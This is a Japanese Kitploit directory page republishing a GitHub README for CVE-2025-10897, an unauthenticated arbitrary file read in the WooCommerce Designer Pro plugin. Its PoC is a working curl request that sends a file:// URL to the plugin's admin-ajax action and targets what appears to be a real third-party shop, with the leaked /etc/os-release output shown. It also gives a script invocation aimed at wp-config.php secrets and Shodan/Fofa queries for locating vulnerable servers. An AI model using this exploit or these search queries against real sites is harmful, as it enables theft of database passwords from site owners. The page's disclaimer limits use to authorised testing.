Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-10897 — WooCommerce Designer Pro <= 1.9.28 - 未認証の任意ファイル読み取り | Kitploit
ツール/GitHubGitHub/error-inside/cve-2025-10897
脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出情報収集ウェブセキュリティペネトレーションテスト
GitHuberror-inside/cve-2025-10897

CVE-2025-10897

WooCommerce Designer Pro <= 1.9.28 - 未認証の任意ファイル読み取り

リポジトリを見る
19日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-10897

Python CVSS License Educational

WooCommerce は、WordPress サイトをオンラインストアに変えるオープンソースの eコマースプラグインです。WooCommerce Designer Pro は、JMA Plugins が開発した WordPress プラグインで、顧客が WooCommerce ストア上で直接製品をデザイン・カスタマイズできるようにします。

重要: WooCommerce と WooCommerce Designer Pro はまったく異なります。

WooCommerce Designer Pro は、名刺、はがき、チラシ、ポスター、Tシャツ、ステッカーなどの印刷物の作成をサポートし、CMYK カラーサポート、PDF 生成、キャンバスベースのデザインインターフェースなどの機能を備えています。このプラグインは WooCommerce と統合されており、購入前にリアルタイムで製品をカスタマイズできるため、オンライン印刷ビジネスやカスタム商品ストアに適しています。

CVE-2025-10897 は、WooCommerce Designer Pro のバージョン 1.9.28 までの認証されていない任意ファイル読み取り(CWE-22)です。攻撃者は POST /wp-admin/admin-ajax.php に action=wcdp_convert_resource_cmyk と、/etc/passwd や wp-config.php などのサーバーファイルを指す file:// URL を送信します。プラグインは JSON レスポンスでファイル内容を返します。これにより、WordPress アカウントなしで wp-config.php からデータベースパスワードやその他の秘密情報が漏洩する可能性があります。

PoC

リクエスト

root@kitploit:~
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: */*' \
  -H 'Connection: close' \
  -d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'

レスポンス

root@kitploit:~
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}

Base64 デコード済みレスポンス:

root@kitploit:~
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"

ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01

使い方

root@kitploit:~
python CVE-2025-10897-X7.py

注: この PoC スクリプトは wp-config.php の取得を試みますが、ターゲットの WordPress が /var/www とは別の場所にインストールされている可能性があります。

脆弱なサーバーを検索するための引数

  • Zern : body:"wc-designer-pro"
  • Fofa : body="wc-designer-pro"
  • Shodan : http.body:"wc-designer-pro"

リソース

  • OpenCVE - WooCommerce Designer Pro <= 1.9.28 認証されていない任意ファイル読み取り
  • NIST - CVE-2025-10897 詳細
  • WooCommerce ホームページ
  • WooCommerce Designer Pro - 公式開発者ウェブサイト
  • WooCommerce Designer Pro - 公式マーケットプレイス
  • Nuclei テンプレート - CVE-2025-10897

免責事項

このリポジトリとその内容は、正当なセキュリティ研究、許可されたペネトレーションテスト、教育目的の調査、および防御目的のためにのみ提供されます。この資料にアクセスまたは使用することにより、利用者は、その活動が適用されるすべての法律を遵守し、所有していないシステムに対してテストまたは適用する前に適切な許可を得ていることを確認したものとみなされます。

このプロジェクトの著作者および保守担当者は、この情報の適用によって生じたいかなる損害、法的結果、または誤用についても責任を負いません。不正アクセス、悪意のある活動、または違法な目的のための使用は、明示的に禁止されており、サポートされていません。

責任を持って使用してください。法的に許容される範囲にとどめてください。所有しているもの、または明示的な書面による許可を得たものだけをテストしてください。

著作者

  • ErrorInside // SCT

ライセンス

SCT-PL

ツールをダウンロード